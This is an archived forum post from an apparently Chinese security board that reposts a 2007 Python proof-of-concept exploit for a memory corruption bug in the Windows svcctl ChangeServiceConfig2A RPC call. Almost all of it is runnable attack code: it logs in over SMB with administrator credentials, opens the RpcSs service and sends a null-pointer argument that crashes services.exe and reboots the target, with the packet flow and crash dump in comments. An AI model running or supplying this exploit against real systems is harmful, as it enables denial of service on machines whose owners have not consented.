MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption(页 1) - 安全测试代码{ Exploits and Shellcode } - 邪恶八进制信息安全团队技术讨论组努力为祖国的信息安全撑起一片蓝天

pub!1c 2007-3-17 23:27

MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption

[code]#!/usr/bin/python
# MS Windows DCE-RPC svcctl ChangeServiceConfig2A() 0day Memory Corruption PoC Exploit
# Bug discovered by Krystian Kloskowski (h07) <[email]h07@interia.pl[/email]>
# Tested on Windows 2000 SP4 Polish (all patches)
#
# Requires..
# - Impacket : [url]http://oss.coresecurity.com/projects/impacket.html[/url]
# - PyCrypto : [url]http://www.amk.ca/python/code/crypto.html[/url]
#
# Details:..
#
# [exploit] Session Setup AndX Request, User: Administrator --> [target]
# [exploit] Session Setup AndX Response <--             [target]
# [exploit] Tree Connect AndX Request -->             [target]
# [exploit] Tree Connect AndX Response <--             [target]
# [exploit] NT Create AndX Request, Path: \svcctl -->       [target]
# [exploit] NT Create AndX Response, Fid: 0x4000 <--       [target]
# [exploit] DCERPC Bind UUID: SVCCTL -->             [target]
# [exploit] DCERPC Bind_ack <--                   [target]
# [exploit] SVCCTL OpenSCManagerW request -->          [target]
# [exploit] SVCCTL OpenSCManagerW response(handle) <--       [target]
# [exploit] SVCCTL OpenServiceW request -->             [target]
# [exploit] SVCCTL OpenServiceW response(handle) <--       [target]
# [exploit] SVCCTL ChangeServiceConfig2A(handle, 1, 1, 0x00000000) --> [target]
# [exploit] DCERPC Fault: status: unknwon(0xc00000fd) <--    [target]
# [exploit] SVCCTL ChangeServiceConfig2A(handle, 1, 1, 0x00000000) --> [target]
# [exploit] SMB Trans Response, Error: Unknown DoS Error <--    [target](crashed)
#
# [Module services]
# Exception C0000005 (ACCESS_VIOLATION reading [00000000])
# -------------------------------------------------------------
# EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EBX=004D83C0: 28 83 4D 00 48 84 4D 00-34 84 4D 00 48 61 08 00
# ECX=00000890: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EDX=00000001: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# ESP=015BF8C0: 34 F9 5B 01 00 00 00 00-00 FB 5B 01 00 00 00 00
# EBP=015BF8F4: 30 F9 5B 01 AD 20 01 01-B8 FB 0D 00 01 00 00 00
# ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EDI=01017000: 90 9C 07 00 FF FF FF FF-00 00 00 00 00 00 00 00
# EIP=010108A8: FF 30 68 90 A5 00 01 FF-75 FC E8 CF 1D 00 00 8B
#       --> PUSH DWORD PTR [EAX]
#
# [Process services.exe terminated, system reboot]
#
# Just for fun ;]
##

from impacket.structure import Structure
from impacket.dcerpc import transport
from impacket import uuid
from random import randint
from time import sleep

host = '192.168.0.1'
username = 'Administrator'
password = 'Administrator_Password'

interface = ('svcctl', '367abb81-9844-35f1-ad32-98f038001003', '2.0')

stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]"
stringbinding %= {
'host': host,
'pipe': interface[0],
}

# random dword
def dword_rand():
  s_dword = 256 ** 4
  return randint(0, s_dword)

# unicode string
def utf16(str):
  return str.encode('utf_16_le')

# MS RPC string
def rpcstr(str, id = 1, unicode_string = 1):
  class foo(Structure):
alignment = 4
structure = ()

if(id == 1):
   structure += (('id', '<L')),

structure += (
   ('max', '<L'),
   ('offset', '<L=0'),
   ('actual', '<L'),
   ('str', '%s'),
)

  query = foo()

  if(id == 1):
query['id'] = dword_rand()

  query['max'] = len(str)
  query['actual'] = len(str)

  if(unicode_string == 1):
query['str'] = utf16(str)
  else:
query['str'] = str

  return query

# MS RPC OpenSCManager
def OpenSCManager(host, access = 1):
  class foo(Structure):
opnum = 0x0f
structure = (
   ('str1', ':'),
   ('null', '<L=0'),
   ('access', '<L'),
)

  query = foo()
  query['str1'] = rpcstr("\\\\%s\x00" % (host))
  query['access'] = access

  return query

# MS RPC OpenServiceW
def OpenService(handle, service, access = 1):
  class foo(Structure):
opnum = 0x10
structure = (
   ('handle', ':'),
   ('str1', ':'),
   ('access', '<L'),
)

  query = foo()

  query['handle'] = handle
  query['str1'] = rpcstr("%s\x00" % (service), 0)
  query['access'] = access

  return query

trans = transport.DCERPCTransportFactory(stringbinding)
trans.set_credentials(username, password)
trans.connect()
dce = trans.DCERPC_class(trans)
dce.bind(uuid.uuidtup_to_bin((interface[1], interface[2])))

query = OpenSCManager(host, access = 1)
dce.call(query.opnum, query)
raw = dce.recv()
handle = raw[:20]

query = OpenService(handle, "RpcSs", access = 0xF01FF)
dce.call(query.opnum, query)
raw = dce.recv()
handle = raw[:20]

##
# ChangeServiceConfig2A() [IDL code generated by mIDA v1.0.7]
#
# typedef struct struct_1 {
# long elem_1;
# [switch_is(elem_1)] union union_2 elem_2;
# } struct_1 ;
#
# typedef [switch_type( unsigned long )] union union_2 {
# [case(1)] struct struct_3 * elem_1;
# [case(2)] struct struct_4 * elem_2;
# } union_2;
#
# typedef struct struct_3 {
# [string] char * elem_1;
# } struct_3 ;
#
#
# /* opcode: 0x24, address: 0x0101203B */
#
# long sub_101203B (
# [in][context_handle] void * arg_1,
# [in] struct struct_1 arg_2
# );
##

class ChangeServiceConfig2A(Structure):
  opnum = 0x24
  structure = (
('context_handle', ':'),
('switch_is', '<L=1'),
('case', '<L=1'),
('struct_3', '<L=0x00000000'), # <-- vulnerable argument
)

query = ChangeServiceConfig2A()
query['context_handle'] = handle

for i in range(0, 2):
  dce.call(query.opnum, query)
  sleep(1)

dce.disconnect()

# EoF

[/code]

页: [1]

邪恶八进制信息安全团队技术讨论组's Archiver

MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption